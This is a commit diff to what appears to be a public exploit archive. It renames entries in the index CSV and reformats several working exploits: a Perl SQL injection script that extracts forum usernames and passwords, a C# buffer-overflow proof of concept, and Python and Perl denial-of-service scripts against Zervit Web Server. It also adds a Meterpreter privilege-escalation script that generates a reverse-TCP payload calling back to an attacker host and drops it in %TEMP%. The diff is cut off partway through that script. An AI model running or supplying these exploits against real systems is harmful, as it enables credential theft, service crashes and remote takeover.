DB: 2016-03-09
1 new exploits
This commit is contained in:
parent
4cae1b12fc
commit
a7c11413af
8 changed files with 388 additions and 269 deletions
22
files.csv
22
files.csv
|
@ -2411,7 +2411,7 @@ id,file,description,date,author,platform,type,port
|
|||
2719,platforms/php/webapps/2719.php,"Quick.Cms.Lite <= 0.3 (Cookie sLanguage) Local File Include Exploit",2006-11-05,Kacper,php,webapps,0
|
||||
2720,platforms/php/webapps/2720.pl,"PHP Classifieds <= 7.1 (detail.php) Remote SQL Injection Exploit",2006-11-05,ajann,php,webapps,0
|
||||
2721,platforms/php/webapps/2721.php,"Ultimate PHP Board <= 2.0 - (header_simple.php) File Include Exploit",2006-11-05,Kacper,php,webapps,0
|
||||
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
|
||||
2722,platforms/php/webapps/2722.pl,"Webdrivers Simple Forum - (message_details.php) SQL Injection Exploit",2006-11-05,Bl0od3r,php,webapps,0
|
||||
2724,platforms/php/webapps/2724.txt,"Soholaunch Pro <= 4.9 r36 - Remote File Inclusion Vulnerabilities",2006-11-06,the_day,php,webapps,0
|
||||
2725,platforms/php/webapps/2725.txt,"Cyberfolio <= 2.0 RC1 (av) Remote File Include Vulnerabilities",2006-11-06,the_day,php,webapps,0
|
||||
2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability",2006-11-06,the_day,php,webapps,0
|
||||
|
@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
|
|||
8444,platforms/windows/local/8444.cpp,"Star Downloader Free <= 1.45 - (.dat) Universal SEH Overwrite Exploit",2009-04-15,dun,windows,local,0
|
||||
8445,platforms/windows/dos/8445.pl,"Microsoft Windows Media Player - (.mid) Integer Overflow PoC",2009-04-15,HuoFu,windows,dos,0
|
||||
8446,platforms/php/webapps/8446.txt,"FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability",2009-04-15,ahmadbady,php,webapps,0
|
||||
8447,platforms/windows/dos/8447.txt,"Zervit Webserver 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
|
||||
8447,platforms/windows/dos/8447.txt,"Zervit Web Server 0.02 - Remote Buffer Overflow PoC",2009-04-15,e.wiZz!,windows,dos,0
|
||||
8448,platforms/php/webapps/8448.php,"Geeklog <= 1.5.2 - savepreferences()/*blocks[] SQL Injection Exploit",2009-04-16,Nine:Situations:Group,php,webapps,0
|
||||
8449,platforms/php/webapps/8449.txt,"NetHoteles 2.0/3.0 (Auth Bypass) SQL Injection Vulnerability",2009-04-16,Dns-Team,php,webapps,0
|
||||
8450,platforms/php/webapps/8450.txt,"Online Password Manager 4.1 Insecure Cookie Handling Vulnerability",2009-04-16,ZoRLu,php,webapps,0
|
||||
|
@ -7970,7 +7970,7 @@ id,file,description,date,author,platform,type,port
|
|||
8460,platforms/php/webapps/8460.txt,"SMA-DB 0.3.13 - Multiple Remote File Inclusion Vulnerabilities",2009-04-16,JosS,php,webapps,0
|
||||
8461,platforms/php/webapps/8461.txt,"chCounter 3.1.3 (Login Bypass) SQL Injection Vulnerability",2009-04-16,tmh,php,webapps,0
|
||||
8462,platforms/windows/dos/8462.pl,"MagicISO CCD/Cue Local Heap Overflow Exploit PoC",2009-04-16,Stack,windows,dos,0
|
||||
8463,platforms/windows/remote/8463.txt,"Zervit Webserver 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
|
||||
8463,platforms/windows/remote/8463.txt,"Zervit Web Server 0.02 - Remote Directory Traversal Vulnerability",2009-04-16,e.wiZz!,windows,remote,0
|
||||
8464,platforms/php/webapps/8464.txt,"Tiny Blogr 1.0.0 rc4 (Auth Bypass) SQL Injection Vulnerability",2009-04-17,"Salvatore Fresta",php,webapps,0
|
||||
8465,platforms/windows/dos/8465.pl,"Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit",2009-04-17,"Code Audit Labs",windows,dos,0
|
||||
8466,platforms/windows/dos/8466.pl,"Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC",2009-04-17,"Code Audit Labs",windows,dos,0
|
||||
|
@ -8007,7 +8007,7 @@ id,file,description,date,author,platform,type,port
|
|||
8497,platforms/php/webapps/8497.txt,"Creasito e-Commerce 1.3.16 (Auth Bypass) SQL Injection Vuln",2009-04-20,"Salvatore Fresta",php,webapps,0
|
||||
8498,platforms/php/webapps/8498.txt,"eLitius 1.0 - Arbitrary Database Backup Exploit",2009-04-20,"ThE g0bL!N",php,webapps,0
|
||||
8499,platforms/php/webapps/8499.php,"Dokeos Lms <= 1.8.5 (whoisonline.php) PHP Code Injection Exploit",2009-04-21,EgiX,php,webapps,0
|
||||
8500,platforms/windows/dos/8500.py,"Zervit Webserver 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
|
||||
8500,platforms/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service Exploit",2009-04-21,shinnai,windows,dos,0
|
||||
8501,platforms/php/webapps/8501.txt,"CRE Loaded 6.2 (products_id) SQL Injection Vulnerability",2009-04-21,Player,php,webapps,0
|
||||
8502,platforms/php/webapps/8502.txt,"pastelcms 0.8.0 - (LFI/SQL) Multiple Vulnerabilities",2009-04-21,SirGod,php,webapps,0
|
||||
8503,platforms/php/webapps/8503.txt,"TotalCalendar 2.4 (include) Local File Inclusion Vulnerability",2009-04-21,SirGod,php,webapps,0
|
||||
|
@ -8029,7 +8029,7 @@ id,file,description,date,author,platform,type,port
|
|||
8519,platforms/windows/local/8519.pl,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit",2009-04-22,Stack,windows,local,0
|
||||
8520,platforms/windows/local/8520.py,"CoolPlayer Portable 2.19.1 - (m3u) Buffer Overflow Exploit (2)",2009-04-22,His0k4,windows,local,0
|
||||
8521,platforms/php/webapps/8521.txt,"fowlcms 1.1 (ab/lfi/su) Multiple Vulnerabilities",2009-04-23,YEnH4ckEr,php,webapps,0
|
||||
8522,platforms/windows/dos/8522.pl,"Zervit HTTP Server <= 0.3 (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
|
||||
8522,platforms/windows/dos/8522.pl,"Zervit Web Server <= 0.3 - (sockets++ crash) Remote Denial of Service",2009-04-22,"Jonathan Salwan",windows,dos,0
|
||||
8523,platforms/windows/dos/8523.txt,"Norton Ghost Support module for EasySetup wizard Remote DoS PoC",2009-04-23,shinnai,windows,dos,0
|
||||
8524,platforms/windows/dos/8524.txt,"Home Web Server <= r1.7.1 (build 147) Gui Thread-Memory Corruption",2009-04-23,Aodrulez,windows,dos,0
|
||||
8525,platforms/windows/remote/8525.pl,"Dream FTP Server 1.02 (users.dat) Arbitrary File Disclosure Exploit",2009-04-23,Cyber-Zone,windows,remote,0
|
||||
|
@ -8171,7 +8171,7 @@ id,file,description,date,author,platform,type,port
|
|||
8663,platforms/windows/local/8663.pl,"CastRipper 2.50.70 - (.pls) Universal Stack Overflow Exploit",2009-05-12,zAx,windows,local,0
|
||||
8664,platforms/php/webapps/8664.pl,"BIGACE CMS 2.5 (username) Remote SQL Injection Exploit",2009-05-12,YEnH4ckEr,php,webapps,0
|
||||
8665,platforms/windows/dos/8665.html,"Java SE Runtime Environment - JRE 6 Update 13 - Multiple Vulnerabilities",2009-05-13,shinnai,windows,dos,0
|
||||
8666,platforms/windows/remote/8666.txt,"zervit webserver 0.4 - Directory Traversal / memory corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
|
||||
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption PoC",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
|
||||
8667,platforms/php/webapps/8667.txt,"TinyButStrong 3.4.0 (script) Local File Disclosure Vulnerability",2009-05-13,ahmadbady,php,webapps,0
|
||||
8668,platforms/php/webapps/8668.txt,"Password Protector SD 1.3.1 Insecure Cookie Handling Vulnerability",2009-05-13,Mr.tro0oqy,php,webapps,0
|
||||
8669,platforms/multiple/dos/8669.c,"ipsec-tools racoon frag-isakmp Denial of Service PoC",2009-05-13,mu-b,multiple,dos,0
|
||||
|
@ -8224,7 +8224,7 @@ id,file,description,date,author,platform,type,port
|
|||
8718,platforms/php/webapps/8718.txt,"douran portal <= 3.9.0.23 - Multiple Vulnerabilities",2009-05-18,Abysssec,php,webapps,0
|
||||
8719,platforms/asp/webapps/8719.py,"Dana Portal - Remote Change Admin Password Exploit",2009-05-18,Abysssec,asp,webapps,0
|
||||
8720,platforms/multiple/dos/8720.c,"OpenSSL <= 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion DoS",2009-05-18,"Jon Oberheide",multiple,dos,0
|
||||
8721,platforms/windows/dos/8721.pl,"Zervit Webserver 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
|
||||
8721,platforms/windows/dos/8721.pl,"Zervit Web Server 0.04 - (GET Request) Remote Buffer Overflow PoC",2009-05-18,Stack,windows,dos,0
|
||||
8722,platforms/windows/dos/8722.py,"Mereo 1.8.0 (Get Request) Remote Denial of Service Exploit",2009-05-18,Stack,windows,dos,0
|
||||
8724,platforms/php/webapps/8724.txt,"LightOpenCMS 0.1 (id) Remote SQL Injection Vulnerability",2009-05-18,Mi4night,php,webapps,0
|
||||
8725,platforms/php/webapps/8725.php,"Jieqi CMS <= 1.5 - Remote Code Execution Exploit",2009-05-18,Securitylab.ir,php,webapps,0
|
||||
|
@ -10279,7 +10279,7 @@ id,file,description,date,author,platform,type,port
|
|||
11196,platforms/windows/dos/11196.html,"Foxit Reader 3.1.4.1125 - ActiveX Heap Overflow PoC",2010-01-19,"SarBoT511 and D3V!L FUCKER",windows,dos,0
|
||||
11197,platforms/windows/dos/11197.py,"Mini-stream Ripper 3.0.1.1 - (.smi) Local Buffer Overflow PoC",2010-01-19,d3b4g,windows,dos,0
|
||||
11198,platforms/php/webapps/11198.txt,"al3jeb script Remote Login Bypass Exploit",2010-01-19,"cr4wl3r ",php,webapps,0
|
||||
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring - Escalation Vulnerability",2010-01-19,"Tavis Ormandy",windows,local,0
|
||||
11199,platforms/windows/local/11199.txt,"Windows NT - User Mode to Ring Escalation Vulnerability (KiTrap0D)",2010-01-19,"Tavis Ormandy",windows,local,0
|
||||
11202,platforms/windows/local/11202.pl,"RM Downloader .m3u BoF (SEH)",2010-01-19,jacky,windows,local,0
|
||||
11203,platforms/multiple/remote/11203.py,"Pidgin MSN <= 2.6.4 File Download Vulnerability",2010-01-19,"Mathieu GASPARD",multiple,remote,0
|
||||
11204,platforms/windows/remote/11204.html,"AOL 9.5 - ActiveX Exploit (Heap Spray) (0day)",2010-01-20,Dz_attacker,windows,remote,0
|
||||
|
@ -10329,7 +10329,7 @@ id,file,description,date,author,platform,type,port
|
|||
11261,platforms/php/webapps/11261.txt,"UGiA PHP UPLOADER 0.2 - Shell Upload Vulnerability",2010-01-26,indoushka,php,webapps,0
|
||||
11262,platforms/php/webapps/11262.php,"Joomla 1.5.12 connect back Exploit",2010-01-26,"Nikola Petrov",php,webapps,0
|
||||
11263,platforms/php/webapps/11263.php,"Joomla 1.5.12 read/exec Remote files",2010-01-26,"Nikoal Petrov",php,webapps,0
|
||||
11264,platforms/windows/local/11264.txt,"South River Technologies WebDrive Service - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
|
||||
11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Local Privilege Escalation",2010-01-26,Trancer,windows,local,0
|
||||
11265,platforms/windows/dos/11265.pl,"KOL WaveIOX 1.04 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
|
||||
11266,platforms/windows/dos/11266.pl,"KOL Wave Player 1.0 - (.wav) Local Buffer Overflow PoC",2010-01-26,"cr4wl3r ",windows,dos,0
|
||||
11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit SEH",2010-01-26,TecR0c,windows,local,0
|
||||
|
@ -11483,8 +11483,8 @@ id,file,description,date,author,platform,type,port
|
|||
12578,platforms/windows/dos/12578.c,"Adobe Shockwave Player 11.5.6.606 (DIR) Multiple Memory Vulnerabilities",2010-05-12,LiquidWorm,windows,dos,0
|
||||
12579,platforms/php/webapps/12579.txt,"Joomla Custom PHP Pages Component com_php LFI Vulnerability",2010-05-12,"Chip d3 bi0s",php,webapps,0
|
||||
12580,platforms/windows/remote/12580.txt,"miniwebsvr 0.0.10 - Directory Traversal/Listing Exploits",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12581,platforms/windows/remote/12581.txt,"zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12582,platforms/windows/remote/12582.txt,"zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12581,platforms/windows/remote/12581.txt,"Zervit Web Server 0.4 - Source Disclosure/Download",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12582,platforms/windows/remote/12582.txt,"Zervit Web Server 0.4 - Directory Traversals",2010-05-12,Dr_IDE,windows,remote,0
|
||||
12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0
|
||||
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0
|
||||
12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,48 +1,48 @@
|
|||
#!perl
|
||||
use IO::Socket;
|
||||
#Download:http://www.thewebdrivers.com/forum.zip
|
||||
#By:Bl0od3r
|
||||
#Germany =]
|
||||
if (@ARGV<3) {
|
||||
&header;
|
||||
} else {
|
||||
&get();
|
||||
}
|
||||
sub get() {
|
||||
$host=$ARGV[0];
|
||||
$path=$ARGV[1];
|
||||
$id=$ARGV[2];
|
||||
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
|
||||
or die ("[-]Error\n");
|
||||
print "[~]Connecting!\n";
|
||||
print "[~]Getting Data!\n";
|
||||
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
|
||||
print $socket "Host: $host\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
|
||||
while ($ans=<$socket>) {
|
||||
$ans=~ m/<span class="style3"> Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
|
||||
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
|
||||
if ($1) {
|
||||
$success=1; } else { $success=0;};
|
||||
}
|
||||
if ($success=="1") {
|
||||
print "\n[+]Successed!";
|
||||
} else {
|
||||
print "[-]Error";
|
||||
}
|
||||
}
|
||||
sub header() {
|
||||
print
|
||||
"--------------------------------------------------------------------\n";
|
||||
print "|\t---------->By Bl0od3r<---------\t\t\t\t |";
|
||||
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |";
|
||||
print
|
||||
"\n--------------------------------------------------------------------\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
# greetz to all dc3 members,matrix_killer and skOd =]
|
||||
|
||||
# milw0rm.com [2006-11-05]
|
||||
#!perl
|
||||
use IO::Socket;
|
||||
#Download:http://www.thewebdrivers.com/forum.zip
|
||||
#By:Bl0od3r
|
||||
#Germany =]
|
||||
if (@ARGV<3) {
|
||||
&header;
|
||||
} else {
|
||||
&get();
|
||||
}
|
||||
sub get() {
|
||||
$host=$ARGV[0];
|
||||
$path=$ARGV[1];
|
||||
$id=$ARGV[2];
|
||||
$socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80)
|
||||
or die ("[-]Error\n");
|
||||
print "[~]Connecting!\n";
|
||||
print "[~]Getting Data!\n";
|
||||
print $socket "GET ".$path."message_details.php?id=-1%20UNION%20SELECT%201,password,username,4,4%20FROM%20tbl_register WHERE id=".$id."/* HTTP/1.1\n";
|
||||
print $socket "Host: $host\n";
|
||||
print $socket "Accept: */*\n";
|
||||
print $socket "Connection: close\n\n";
|
||||
|
||||
while ($ans=<$socket>) {
|
||||
$ans=~ m/<span class="style3"> Re : -(.*?)-/ && print "--------------------------------------------\n[+]UserName: $1\n[+]PassWord:";
|
||||
$ans=~ m/<td class=\"text\">(.*?)<\/td>/ && print "$1\n";
|
||||
if ($1) {
|
||||
$success=1; } else { $success=0;};
|
||||
}
|
||||
if ($success=="1") {
|
||||
print "\n[+]Successed!";
|
||||
} else {
|
||||
print "[-]Error";
|
||||
}
|
||||
}
|
||||
sub header() {
|
||||
print
|
||||
"--------------------------------------------------------------------\n";
|
||||
print "|\t---------->By Bl0od3r<---------\t\t\t\t |";
|
||||
print "\n|Usage:script.pl host.com /path/ 1\t\t\t\t |";
|
||||
print
|
||||
"\n--------------------------------------------------------------------\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
# greetz to all dc3 members,matrix_killer and skOd =]
|
||||
|
||||
# milw0rm.com [2006-11-05]
|
||||
|
|
|
@ -1,50 +1,50 @@
|
|||
#################### Zervit Webserver 0.02 Buffer Overflow ############################
|
||||
|
||||
|
||||
############### By: e.wiZz!
|
||||
|
||||
###############Site: www.balcansecurity.com
|
||||
|
||||
|
||||
############### Found with ServMeNot (world's sexiest fuzzer :P )
|
||||
|
||||
|
||||
|
||||
In the wild...
|
||||
|
||||
########################################################################################
|
||||
|
||||
######Vend0r site: http://www.ohloh.net/projects/mereo
|
||||
|
||||
|
||||
/* When requested uri isn't found,it goes to char tmp[255],
|
||||
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
|
||||
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
|
||||
class whatsoever
|
||||
{
|
||||
static void Main()
|
||||
{
|
||||
// StringBuilder sb = new StringBuilder();
|
||||
|
||||
//byte[] buf = new byte[8192];
|
||||
|
||||
Console.WriteLine("Enter site: (http://localhost)");
|
||||
string sajt = Console.ReadLine();
|
||||
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
|
||||
HttpWebRequest request = (HttpWebRequest)
|
||||
|
||||
WebRequest.Create(sajt+uribad);
|
||||
|
||||
HttpWebResponse response = (HttpWebResponse)
|
||||
request.GetResponse();
|
||||
// you shouldn't see response
|
||||
Console.WriteLine(sb.ToString());
|
||||
}
|
||||
}
|
||||
|
||||
// milw0rm.com [2009-04-15]
|
||||
#################### Zervit Webserver 0.02 Buffer Overflow ############################
|
||||
|
||||
|
||||
############### By: e.wiZz!
|
||||
|
||||
###############Site: www.balcansecurity.com
|
||||
|
||||
|
||||
############### Found with ServMeNot (world's sexiest fuzzer :P )
|
||||
|
||||
|
||||
|
||||
In the wild...
|
||||
|
||||
########################################################################################
|
||||
|
||||
######Vend0r site: http://www.ohloh.net/projects/mereo
|
||||
|
||||
|
||||
/* When requested uri isn't found,it goes to char tmp[255],
|
||||
and later it is used to output,you need 256 chars to overflow (check source "http.c") */
|
||||
|
||||
using System;
|
||||
using System.IO;
|
||||
using System.Net;
|
||||
using System.Text;
|
||||
|
||||
class whatsoever
|
||||
{
|
||||
static void Main()
|
||||
{
|
||||
// StringBuilder sb = new StringBuilder();
|
||||
|
||||
//byte[] buf = new byte[8192];
|
||||
|
||||
Console.WriteLine("Enter site: (http://localhost)");
|
||||
string sajt = Console.ReadLine();
|
||||
string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
|
||||
HttpWebRequest request = (HttpWebRequest)
|
||||
|
||||
WebRequest.Create(sajt+uribad);
|
||||
|
||||
HttpWebResponse response = (HttpWebResponse)
|
||||
request.GetResponse();
|
||||
// you shouldn't see response
|
||||
Console.WriteLine(sb.ToString());
|
||||
}
|
||||
}
|
||||
|
||||
// milw0rm.com [2009-04-15]
|
||||
|
|
|
@ -1,31 +1,31 @@
|
|||
import socket
|
||||
import sys
|
||||
|
||||
print "------------------------------------------------------"
|
||||
print " Zervit Webserver 0.3 Remote Denial Of Service "
|
||||
print " url: http://zervit.sourceforge.net "
|
||||
print " "
|
||||
print " author: shinnai "
|
||||
print " mail: shinnai[at]autistici[dot]org "
|
||||
print " site: http://www.shinnai.net "
|
||||
print " "
|
||||
print " greets to: e.wiZz! for inspiration. Be safe man... "
|
||||
print " "
|
||||
print " dedicated to: all those tried to own my site :-p "
|
||||
print "------------------------------------------------------"
|
||||
|
||||
host = "127.0.0.1"
|
||||
port = 80
|
||||
|
||||
try:
|
||||
buff = "//.\\" * 330
|
||||
request = "GET " + buff + " HTTP/1.0"
|
||||
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connection.connect((host, port))
|
||||
connection.send(request)
|
||||
raw_input('\n\nExploit completed. Press "Enter" to quit...')
|
||||
sys.exit
|
||||
except:
|
||||
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
|
||||
|
||||
# milw0rm.com [2009-04-21]
|
||||
import socket
|
||||
import sys
|
||||
|
||||
print "------------------------------------------------------"
|
||||
print " Zervit Webserver 0.3 Remote Denial Of Service "
|
||||
print " url: http://zervit.sourceforge.net "
|
||||
print " "
|
||||
print " author: shinnai "
|
||||
print " mail: shinnai[at]autistici[dot]org "
|
||||
print " site: http://www.shinnai.net "
|
||||
print " "
|
||||
print " greets to: e.wiZz! for inspiration. Be safe man... "
|
||||
print " "
|
||||
print " dedicated to: all those tried to own my site :-p "
|
||||
print "------------------------------------------------------"
|
||||
|
||||
host = "127.0.0.1"
|
||||
port = 80
|
||||
|
||||
try:
|
||||
buff = "//.\\" * 330
|
||||
request = "GET " + buff + " HTTP/1.0"
|
||||
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
connection.connect((host, port))
|
||||
connection.send(request)
|
||||
raw_input('\n\nExploit completed. Press "Enter" to quit...')
|
||||
sys.exit
|
||||
except:
|
||||
raw_input('\n\nUnable to connect. Press "Enter" to quit...')
|
||||
|
||||
# milw0rm.com [2009-04-21]
|
||||
|
|
|
@ -1,39 +1,39 @@
|
|||
#!/usr/bin/perl
|
||||
#
|
||||
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
|
||||
#
|
||||
# --------------------------------------------------------------------
|
||||
# The vulnerability is caused due to an error in multi-socket.
|
||||
# This can be exploited to crash the HTTP service.
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# Author: Jonathan Salwan
|
||||
# Mail: submit [AT] shell-storm.org
|
||||
# Web: http://www.shell-storm.org
|
||||
|
||||
|
||||
use IO::Socket;
|
||||
print "[+] Author : Jonathan Salwan\n";
|
||||
print "[+] Soft : Zervit 0.3 Remote DoS\n";
|
||||
|
||||
if (@ARGV < 1)
|
||||
{
|
||||
print "[-] Usage: <file.pl> <host> <port>\n";
|
||||
print "[-] Exemple: file.pl 127.0.0.1 80\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
$ip = $ARGV[0];
|
||||
$port = $ARGV[1];
|
||||
|
||||
print "[+] Sending request...\n";
|
||||
|
||||
for($i=0;$i=4;$i++)
|
||||
{
|
||||
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
|
||||
|
||||
print $socket "GET \x11 HTTP/1.0\n\r\n";
|
||||
}
|
||||
|
||||
# milw0rm.com [2009-04-22]
|
||||
#!/usr/bin/perl
|
||||
#
|
||||
# Zervit HTTP Server <= v0.3 Remote Denial of Service.
|
||||
#
|
||||
# --------------------------------------------------------------------
|
||||
# The vulnerability is caused due to an error in multi-socket.
|
||||
# This can be exploited to crash the HTTP service.
|
||||
# --------------------------------------------------------------------
|
||||
#
|
||||
# Author: Jonathan Salwan
|
||||
# Mail: submit [AT] shell-storm.org
|
||||
# Web: http://www.shell-storm.org
|
||||
|
||||
|
||||
use IO::Socket;
|
||||
print "[+] Author : Jonathan Salwan\n";
|
||||
print "[+] Soft : Zervit 0.3 Remote DoS\n";
|
||||
|
||||
if (@ARGV < 1)
|
||||
{
|
||||
print "[-] Usage: <file.pl> <host> <port>\n";
|
||||
print "[-] Exemple: file.pl 127.0.0.1 80\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
||||
$ip = $ARGV[0];
|
||||
$port = $ARGV[1];
|
||||
|
||||
print "[+] Sending request...\n";
|
||||
|
||||
for($i=0;$i=4;$i++)
|
||||
{
|
||||
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "[-]Done!\n";
|
||||
|
||||
print $socket "GET \x11 HTTP/1.0\n\r\n";
|
||||
}
|
||||
|
||||
# milw0rm.com [2009-04-22]
|
||||
|
|
119
platforms/windows/local/11264.rb
Executable file
119
platforms/windows/local/11264.rb
Executable file
|
@ -0,0 +1,119 @@
|
|||
##
|
||||
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
|
||||
#
|
||||
# This module exploits a privilege escalation vulnerability in South River Technologies WebDrive.
|
||||
# Due to an empty security descriptor, a local attacker can gain elevated privileges.
|
||||
# Tested on South River Technologies WebDrive 9.02 build 2232 on Microsoft Windows XP SP3.
|
||||
# Vulnerability mitigation featured.
|
||||
#
|
||||
# Credit:
|
||||
# - Discovery - Nine:Situations:Group::bellick
|
||||
# - Meterpreter script - Trancer
|
||||
#
|
||||
# References:
|
||||
# - http://retrogod.altervista.org/9sg_south_river_priv.html
|
||||
# - http://www.rec-sec.com/2010/01/26/srt-webdrive-privilege-escalation/
|
||||
# - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-4606
|
||||
# - http://osvdb.org/show/osvdb/59080
|
||||
#
|
||||
# mtrancer[@]gmail.com
|
||||
# http://www.rec-sec.com
|
||||
##
|
||||
|
||||
#
|
||||
# Options
|
||||
#
|
||||
opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "This help menu"],
|
||||
"-m" => [ false, "Mitigate"],
|
||||
"-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
|
||||
"-p" => [ true, "The port on the remote host where Metasploit is listening"]
|
||||
)
|
||||
|
||||
#
|
||||
# Default parameters
|
||||
#
|
||||
|
||||
rhost = Rex::Socket.source_address("1.2.3.4")
|
||||
rport = 4444
|
||||
sname = 'WebDriveService'
|
||||
pname = 'wdService.exe'
|
||||
|
||||
#
|
||||
# Option parsing
|
||||
#
|
||||
opts.parse(args) do |opt, idx, val|
|
||||
case opt
|
||||
when "-h"
|
||||
print_status("South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.")
|
||||
print_line(opts.usage)
|
||||
raise Rex::Script::Completed
|
||||
when "-m"
|
||||
client.sys.process.get_processes().each do |m|
|
||||
if ( m['name'] == pname )
|
||||
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
||||
|
||||
# Set correct service security descriptor to mitigate the vulnerability
|
||||
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
|
||||
client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
|
||||
end
|
||||
end
|
||||
raise Rex::Script::Completed
|
||||
when "-r"
|
||||
rhost = val
|
||||
when "-p"
|
||||
rport = val.to_i
|
||||
end
|
||||
end
|
||||
|
||||
client.sys.process.get_processes().each do |m|
|
||||
if ( m['name'] == pname )
|
||||
|
||||
print_status("Found vulnerable process #{m['name']} with pid #{m['pid']}.")
|
||||
|
||||
# Build out the exe payload.
|
||||
pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
|
||||
pay.datastore['LHOST'] = rhost
|
||||
pay.datastore['LPORT'] = rport
|
||||
raw = pay.generate
|
||||
|
||||
exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
|
||||
|
||||
# Place our newly created exe in %TEMP%
|
||||
tempdir = client.fs.file.expand_path("%TEMP%")
|
||||
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
print_status("Sending EXE payload '#{tempexe}'.")
|
||||
fd = client.fs.file.new(tempexe, "wb")
|
||||
fd.write(exe)
|
||||
fd.close
|
||||
|
||||
